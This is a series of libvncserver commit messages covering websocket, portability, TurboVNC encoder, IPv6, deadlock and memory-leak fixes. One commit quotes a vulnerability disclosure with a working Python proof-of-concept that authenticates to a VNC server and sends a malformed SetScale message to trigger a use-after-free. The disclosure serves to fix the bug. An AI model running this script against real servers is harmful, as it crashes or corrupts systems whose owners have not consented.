- When processing input, check if there is any extra data
pending in the internal websocket frame and SSL buffers.
- Prevents input events lagging behind because they get
stuck in one of the buffers.
Data pending in our own buffers cannot be detected with
select() so was not processed until more input arrives
from the network.
- Closes # 55
Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
Reported by Ken Johnson <Ken.Johnson1@telus.com>.
The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero)
if (msg.ssc.scale == 0) {
rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale);
rfbSendNewScaleSize(cl); << This is the call that can trigger a free.
return;
at the end, both cases there is a call the rfbSendNewScaleSize function, where if the connection is subsequently disconnected after sending the VNC scaling message can lead to a free occurring.
else
{
rfbResizeFrameBufferMsg rmsg;
rmsg.type = rfbResizeFrameBuffer;
rmsg.pad1=0;
rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width);
rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height);
rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height);
if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) {
rfbLogPerror("rfbNewClient: write");
rfbCloseClient(cl);
rfbClientConnectionGone(cl); << Call which may can lead to a free.
return FALSE;
}
}
return TRUE;
Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data.
POC script to trigger the vulnerability:
---snip---
import socket,binascii,struct,sys
from time import sleep
class RFB:
INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
AUTH_NO_PASS = "\x01"
AUTH_PASS = "\x02"
SHARE_DESKTOP = "\x01"
def AUTH_PROCESS(self,data,flag):
if flag == 0:
# Get security types
secTypeCount = data[0]
secType = {}
for i in range(int(len(secTypeCount))):
secType[i] = data[1]
return secType
elif flag == 1:
# Get auth result
# 0 means auth success
# 1 means failure
return data[3]
def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD):
try:
from Crypto.Cipher import DES
except:
print "Error importing crypto. Please fix or do not require authentication"
sys.exit(1)
if len(PASSWORD) != 8:
PASSWORD = PASSWORD.ljust(8, '\0')
PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))]
PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7]))
crypto = DES.new(PASSWORD)
return crypto.encrypt(data)
def reverse_bits(self,x):
a=0
for i in range(8):
a += ((x>>i)&1)<<(7-i)
return a
def main(argv):
print "Proof of Concept"
print "Copyright TELUS Security Labs"
print "All Rights Reserved.\n"
try:
HOST = sys.argv[1]
PORT = int(sys.argv[2])
except:
print "Usage: python setscale_segv_poc.py <host> <port> [password]"
sys.exit(1)
try:
PASSWORD = sys.argv[3]
except:
print "No password supplied"
PASSWORD = ""
vnc = RFB()
remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote.connect((HOST,PORT))
# Get server version
data = remote.recv(1024)
# Send 3.8 version
remote.send(vnc.INIT_3008)
# Get supported security types
data = remote.recv(1024)
# Process Security Message
secType = vnc.AUTH_PROCESS(data,0)
if secType[0] == "\x02":
# Send accept for password auth
remote.send(vnc.AUTH_PASS)
# Get challenge
data = remote.recv(1024)
# Send challenge response
remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD))
elif secType[0] == "\x01":
# Send accept for None pass
remote.send(vnc.AUTH_NO_PASS)
else:
print 'The server sent us something weird during auth.'
sys.exit(1)
# Get result
data = remote.recv(1024)
# Process result
result = vnc.AUTH_PROCESS(data,1)
if result == "\x01":
# Authentication failure.
data = remote.recv(1024)
print 'Authentication failure. Server Reason: ' + str(data)
sys.exit(1)
elif result == "\x00":
print "Authentication success."
else:
print 'Some other authentication issue occured.'
sys.exit(1)
# Send ClientInit
remote.send(vnc.SHARE_DESKTOP)
# Send malicious message
print "Sending malicious data..."
remote.send("\x08\x08\x00\x00")
remote.close()
if __name__ == "__main__":
main(sys.argv)
---snap---
There was a possible buffer overflow in rfbFileTransferOffer message when
processing the FileTime.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
GCC < 4.6 failed to parse the declaration of ws_header_t correctly because
it did not accept anonymous structs and unions. [1]
Work around the bug by adding names to the unions and structs. Ugly, but
works.
[1] http://gcc.gnu.org/bugzilla/show_bug.cgi?id=4784
byteswap.h exists only on glibc, so building libvncserver with websockets
support was not possible in other systems.
Replace the inclusion of byteswap.h and the WS_* definitions with calls to
htobeNN, which should perform the same conversions, be more portable and
avoid the need to check for the platform's endianness.
The current definitions were mostly useful to glibc and followed its
feature_test_macros(3) documentation.
However, this means other platforms still had problems when building with
strict compilation flags. _BSD_SOURCE, for example, is only recognized by
glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the
removal of some definitions (such as the outdate _POSIX_SOURCE one).
_POSIX_SOURCE also had to be conditionally defined in some places, as what
it enables or disables during compilation varies across systems.
Building with -ansi failed due to some code (as well as system
headers) using non-C89 features. Fix that by adding the usual
_POSIX_SOURCE and _BSD_SOURCE definitions already present in some
other files.
TightPNG replaces the ZLIB stuff int Tight encoding with PNG. It still
uses JPEG rects as well. Theoretically, we could build TightPNG with only
libpng and libjpeg - without zlib - but libpng depends on zlib, so this is
kinda moot.
-- TightPng encoding and the rfbTightNoZlib extension need not conflict. Since
TightPng is a separate encoding type, not supported by TurboVNC-compatible
viewers, then the rfbTightNoZlib extension can be used solely whenever the
encoding type is Tight and disabled with the encoding type is TightPng.
-- In the TightVNC encoder, compression levels above 5 are basically useless.
On the set of 20 low-level datasets that were used to design the TurboVNC
encoder (these include the eight 2D application captures that were also used
when designing the TightVNC encoder, as well as 12 3D application captures
provided by the VirtualGL Project--
see http://www.virtualgl.org/pmwiki/uploads/About/tighttoturbo.pdf), moving
from Compression Level (CL) 5 to CL 9 in the TightVNC encoder did not
increase the compression ratio of any datasets more than 10%, and the
compression ratio only increased by more than 5% on four of them. The
compression ratio actually decreased a few percent on five of them. In
exchange for this paltry increase in compression ratio, the CPU usage, on
average, went up by a factor of 5. Thus, for all intents and purposes,
TightVNC CL 5 provides the "best useful compression" for that encoder.
-- TurboVNC's best compression level (CL 2) compresses 3D and video workloads
significantly more "tightly" than TightVNC CL 5 (~70% better, in the
aggregate) but does not quite achieve the same level of compression with 2D
workloads (~20% worse, in the aggregate.) This decrease in compression ratio
may or may not be noticeable, since many of the datasets it affects are not
performance-critical (such as the console output of a compilation, etc.)
However, for peace of mind, it was still desirable to have a mode that
compressed with equal "tightness" to TightVNC CL 5, since we proposed to
replace that encoder entirely.
-- A new mode was discovered in the TurboVNC encoder that produces, in the
aggregate, similar compression ratios on 2D datasets as TightVNC CL 5. That
new mode involves using Zlib level 7 (the same level used by TightVNC CL 5)
but setting the "palette threshold" to 256, so that indexed color encoding
is used whenever possible. This mode reduces bandwidth only marginally
(typically 10-20%) relative to TurboVNC CL 2 on low-color workloads, in
exchange for nearly doubling CPU usage, and it does not benefit high-color
workloads at all (since those are usually encoded with JPEG.) However, it
provides a means of reproducing the same "tightness" as the TightVNC
encoder on 2D workloads without sacrificing any compression for 3D/video
workloads, and without using any more CPU time than necessary.
-- The TurboVNC encoder still performs as well or better than the TightVNC
encoder when plain libjpeg is used instead of libjpeg-turbo.
Specific notes follow:
common/turbojpeg.c common/turbojpeg.h:
Added code to emulate the libjpeg-turbo colorspace extensions, so that the
TurboJPEG wrapper can be used with plain libjpeg as well. This required
updating the TurboJPEG wrapper to the latest code from libjpeg-turbo 1.2.0,
mainly because the TurboJPEG 1.2 API handles pixel formats in a much cleaner
way, which made the conversion code easier to write. It also eases the
maintenance to have the wrapper synced as much as possible with the upstream
code base (so I can merge any relevant bug fixes that are discovered upstream.)
The libvncserver version of the TurboJPEG wrapper is a "lite" version,
containing only the JPEG compression/decompression code and not the lossless
transform, YUV encoding/decoding, and dynamic buffer allocation features from
TurboJPEG 1.2.
configure.ac:
Removed the --with-turbovnc option. configure still checks for the presence of
libjpeg-turbo, but only for the purposes of printing a performance warning if
it isn't available.
rfb/rfb.h:
Fix a bug introduced with the initial TurboVNC encoder patch. We cannot use
tightQualityLevel for the TurboVNC 1-100 quality level, because
tightQualityLevel is also used by ZRLE. Thus, a new parameter
(turboQualityLevel) was created.
rfb/rfbproto.h:
Remove TurboVNC-specific #ifdefs and language
libvncserver/rfbserver.c:
Remove TurboVNC-specific #ifdefs. Fix afore-mentioned tightQualityLevel bug.
libvncserver/tight.c:
Replaced the TightVNC encoder with the TurboVNC encoder. Relative to the
initial TurboVNC encoder patch, this patch also:
-- Adds TightPng support to the TurboVNC encoder
-- Adds the afore-mentioned low-bandwidth mode, which is mapped externally to
Compression Level 9
test/*:
Included TJUnitTest (a regression test for the TurboJPEG wrapper) as well as
TJBench (a benchmark for same.) These are useful for ensuring that the wrapper
still functions correctly and performantly if it needs to be modified for
whatever reason. Both of these programs are derived from libjpeg-turbo 1.2.0.
As with the TurboJPEG wrapper, they do not contain the more advanced features
of TurboJPEG 1.2, such as YUV encoding/decoding and lossless transforms.
The issue is that, when using the current libvncserver source, it is impossible to disable Tight JPEG encoding.
The way Tight/Turbo viewers disable JPEG encoding is by simply not sending the Tight quality value, causing the
server to use the default value of -1. Thus, cl->tightQualityLevel has to be set to -1 prior to processing the
encodings message for this mechanism to work. Similarly, it is not guaranteed that the compress level will be
set in the encodings message, so it is set to a default value prior to processing the message.
TurboVNC is a variant of TightVNC that uses the same client/server protocol (RFB version 3.8t),
and thus it is fully cross-compatible with TightVNC and TigerVNC (with one exception, which is noted below.)
Both the TightVNC and TurboVNC encoders analyze each rectangle, pick out regions of solid color to send
separately, and send the remaining subrectangles using mono, indexed color, JPEG, or raw encoding, depending
on the number of colors in the subrectangle. However, TurboVNC uses a fundamentally different selection
algorithm to determine the appropriate subencoding to use for each subrectangle. Thus, while it sends a
protocol stream that can be decoded by any TightVNC-compatible viewer, the mix of subencoding types in this
protocol stream will be different from those generated by a TightVNC server.
The research that led to TurboVNC is described in the following report:
http://www.virtualgl.org/pmwiki/uploads/About/tighttoturbo.pdf.
In summary: 20 RFB captures, representing "common" 2D and 3D application workloads (the 3D workloads were
run using VirtualGL), were studied using the TightVNC encoder in isolation. Some of the analysis features
in the TightVNC encoder, such as smoothness detection, were found to generate a lot of CPU usage with little
or no benefit in compression, so those features were disabled. JPEG encoding was accelerated using
libjpeg-turbo (which achieves a 2-4x speedup over plain libjpeg on modern x86 or ARM processors.) Finally,
the "palette threshold" (minimum number of colors that the subrectangle must have before it is compressed
using JPEG or raw) was adjusted to account for the fact that JPEG encoding is now quite a bit faster
(meaning that we can now use it more without a CPU penalty.) TurboVNC has additional optimizations,
such as the ability to count colors and encode JPEG images directly from the framebuffer without first
translating the pixels into RGB. The TurboVNC encoder compares quite favorably in terms of compression
ratio with TightVNC and generally encodes a great deal faster (often an order of magnitude or more.)
The version of the TurboVNC encoder included in this patch is roughly equivalent to the one found in version
0.6 of the Unix TurboVNC Server, with a few minor patches integrated from TurboVNC 1.1. TurboVNC 1.0
added multi-threading capabilities, which can be added in later if desired (at the expense of making
libvncserver depend on libpthread.)
Because TurboVNC uses a fundamentally different mix of subencodings than TightVNC, because it uses
the identical protocol (and thus a viewer really has no idea whether it's talking to a TightVNC or
TurboVNC server), and because it doesn't support rfbTightPng (and in fact conflicts with it-- see below),
the TurboVNC and TightVNC encoders cannot be enabled simultaneously.
Compatibility:
In *most* cases, a TurboVNC-enabled viewer is fully compatible with a TightVNC server, and vice versa.
TurboVNC supports pseudo-encodings for specifying a fine-grained (1-100) quality scale and specifying
chrominance subsampling. If a TurboVNC viewer sends those to a TightVNC server, then the TightVNC server
ignores them, so the TurboVNC viewer also sends the quality on a 0-9 scale that the TightVNC server can
understand. Similarly, the TurboVNC server checks first for fine-grained quality and subsampling
pseudo-encodings from the viewer, and failing to receive those, it then checks for the TightVNC 0-9
quality pseudo-encoding.
There is one case in which the two systems are not compatible, and that is when a TightVNC or TigerVNC
viewer requests compression level 0 without JPEG from a TurboVNC server. For performance reasons,
this causes the TurboVNC server to send images directly to the viewer, bypassing Zlib. When the
TurboVNC server does this, it also sets bits 7-4 in the compression control byte to rfbTightNoZlib (0x0A),
which is unfortunately the same value as rfbTightPng. Older TightVNC viewers that don't handle PNG
will assume that the stream is uncompressed but still encapsulated in a Zlib structure, whereas newer
PNG-supporting TightVNC viewers will assume that the stream is PNG. In either case, the viewer will
probably crash. Since most VNC viewers don't expose compression level 0 in the GUI, this is a
relatively rare situation.
Description of changes:
configure.ac
-- Added support for libjpeg-turbo. If passed an argument of --with-turbovnc, configure will now run
(or, if cross-compiling, just link) a test program that determines whether the libjpeg library being
used is libjpeg-turbo. libjpeg-turbo must be used when building the TurboVNC encoder, because the
TurboVNC encoder relies on the libjpeg-turbo colorspace extensions in order to compress images directly
out of the framebuffer (which may be, for instance, BGRA rather than RGB.) libjpeg-turbo can optionally
be used with the TightVNC encoder as well, but the speedup will only be marginal (the report linked
above explains why in more detail, but basically it's because of Amdahl's Law. The TightVNC encoder
was designed with the assumption that JPEG had a very high CPU cost, and thus JPEG is used only sparingly.)
-- Added a new configure variable, JPEG_LDFLAGS. This is necessitated by the fact that libjpeg-turbo
often distributes libjpeg.a and libjpeg.so in /opt/libjpeg-turbo/lib32 or /opt/libjpeg-turbo/lib64,
and many people prefer to statically link with it. Thus, more flexibility is needed than is provided
by --with-jpeg. If JPEG_LDFLAGS is specified, then it overrides the changes to LDFLAGS enacted by
--with-jpeg (but --with-jpeg is still used to set the include path.) The addition of JPEG_LDFLAGS
necessitated replacing AC_CHECK_LIB with AC_LINK_IFELSE (because AC_CHECK_LIB automatically sets
LIBS to -ljpeg, which is not what we want if we're, for instance, linking statically with libjpeg-turbo.)
-- configure does not check for PNG support if TurboVNC encoding is enabled. This prevents the
rfbSendRectEncodingTightPng() function from being compiled in, since the TurboVNC encoder doesn't
(and can't) support it.
common/turbojpeg.c, common/turbojpeg.h
-- TurboJPEG is a simple API used to compress and decompress JPEG images in memory. It was originally
implemented because it was desirable to use different types of underlying technologies to compress
JPEG on different platforms (mediaLib on SPARC, Quicktime on PPC Macs, Intel Performance Primitives, etc.)
These days, however, libjpeg-turbo is the only underlying technology used by TurboVNC, so TurboJPEG's
purpose is largely just code simplicity and flexibility. Thus, since there is no real need for
libvncserver to use any technology other than libjpeg-turbo for compressing JPEG, the TurboJPEG wrapper
for libjpeg-turbo has been included in-tree so that libvncserver can be directly linked with libjpeg-turbo.
This is convenient because many modern Linux distros (Fedora, Ubuntu, etc.) now ship libjpeg-turbo as
their default libjpeg library.
libvncserver/rfbserver.c
-- Added logic to check for the TurboVNC fine-grained quality level and subsampling encodings and to
map Tight (0-9) quality levels to appropriate fine-grained quality level and subsampling values if
communicating with a TightVNC/TigerVNC viewer.
libvncserver/turbo.c
-- TurboVNC encoder (compiled instead of libvncserver/tight.c)
rfb/rfb.h
-- Added support for the TurboVNC subsampling level
rfb/rfbproto.h
-- Added constants for the TurboVNC fine quality level and subsampling encodings as well as the rfbTightNoZlib
constant and notes on its usage.
Besided making libvncserver reverseVNC IPv6-aware, this introduces some changes
on the client side as well to make clients listen on IPv6 sockets, too. Like
the server side, this also uses a separate-socket approach.
This uses a separate-socket approach since there are systems that do not
support dual binding sockets under *any* circumstances, for instance
OpenBSD. Using separate sockets for IPv4 and IPv6 is thus more portable
than having a v6 socket handle v4 connections as well.
Signed-off-by: Christian Beier <dontmind@freeshell.org>
Support connections from the Mac OS X built-in VNC client to
LibVNCServers running with no password and advertising a server
version of 3.7 or greater.
The png stuff in tight.c depends on code in tight.c that uses libjpeg
features. We could probably seperate that, but for now the dependency
for 'tight' goes:
PNG depends on JPEG depends on ZLIB.
This is reflected in Makefile.am now.
NB: Building tight.c with JPEG but without PNG is still possible,
but nor the other way around.
Lengthy explanation follows...
First, the scenario before this patch:
We have three clients 1,2,3 connected. The main thread loops through
them using rfbClientIteratorNext() (loop L1) and is currently at
client 2 i.e. client 2's cl_2->refCount is 1. At this point we need to
loop again through the clients, with cl_2->refCount == 1, i.e. do a
loop L2 nested within loop L1.
BUT: Now client 2 disconnects, it's clientInput thread terminates its
clientOutput thread and calls rfbClientConnectionGone(). This LOCKs
clientListMutex and WAITs for cl_2->refCount to become 0. This means
this thread waits for the main thread to release cl_2. Waiting, with
clientListMutex LOCKed!
Meanwhile, the main thread is about to begin the inner
rfbClientIteratorNext() loop L2. The first call to rfbClientIteratorNext()
LOCKs clientListMutex. BAAM. This mutex is locked by cl2's clientInput
thread and is only released when cl_2->refCount becomes 0. The main thread
would decrement cl_2->refCount when it would continue with loop L1. But
it's waiting for cl2's clientInput thread to release clientListMutex. Which
never happens since this one's waiting for the main thread to decrement
cl_2->refCount. DEADLOCK.
Now, situation with this patch:
Same as above, but when client 2 disconnects it's clientInput thread
rfbClientConnectionGone(). This again LOCKs clientListMutex, removes cl_2
from the linked list and UNLOCKS clientListMutex. The WAIT for
cl_2->refCount to become 0 is _after_ that. Waiting, with
clientListMutex UNLOCKed!
Therefore, the main thread can continue, do the inner loop L2 (now only
looping through 1,3 - 2 was removed from the linked list) and continue with
loop L1, finally decrementing cl_2->refCount, allowing cl2's clientInput
thread to continue and terminate. The resources held by cl2 are not free()'d
by rfbClientConnectionGone until cl2->refCount becomes 0, i.e. loop L1 has
released cl2.
I was debbuging some code tonight and i found a pointer that is not been
freed, so i think there is maybe a memory leak, so it is...
there is the malloc caller reverse order:
( malloc cl->statEncList )
<- rfbStatLookupEncoding
<- rfbStatRecordEncodingSent
<- rfbSendCursorPos
<- rfbSendFramebufferUpdate
<- rfbProcessEvents
I didnt look the whole libvncserver api, but i am using
rfbReverseConnection with rfbProcessEvents, and then when the client
connection dies, i am calling a rfbShutdownServer and rfbScreenCleanup,
but the malloc at rfbStatLookupEncoding isnt been freed.
So to free the stats i added a rfbResetStats(cl) after rfbPrintStats(cl)
at rfbClientConnectionGone in rfbserver.c before free the cl pointer. (at
rfbserver.c line 555). And this, obviously, is correcting the memory leak.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
We do this simply by omitting the content-type and let the browser
decide upon the mime-type of the sent file. Only exception is
'index.vnc', where we do set the content-type since some browsers
fail to detect it's html when it's ending in '.vnc'
Also, remove superfluous #defines. We close the connection always.
Add common/sha1.h and common/sha1.c so that we have the SHA routines
even if openssl is not available. From the IETF SHA RFC example code.
Remove the UTF-8 encoding hack. This was really just an experiment.
If the protocol passed in the handshake has "binary" then don't base64
encode for the HyBi protocol. This will allow noVNC to request the
binary data be passed raw and not base64 encoded. Unfortunately, the
client doesn't speak first in VNC protocol (bad original design). If
it did then we could determine whether to base64 encode or not based
on the first HyBi frame from the client and whether the binary bit is
set or not. Oh well.
Misc Cleanup:
- Always free response and buf in handshake routine.
- Remove some unused variables.
Move the hixie disconnect hack to websockets.c. Removed
the remaining websockets vars from rfbClientPtr, so all
websockets stuff is hidden behind an opaque pointer.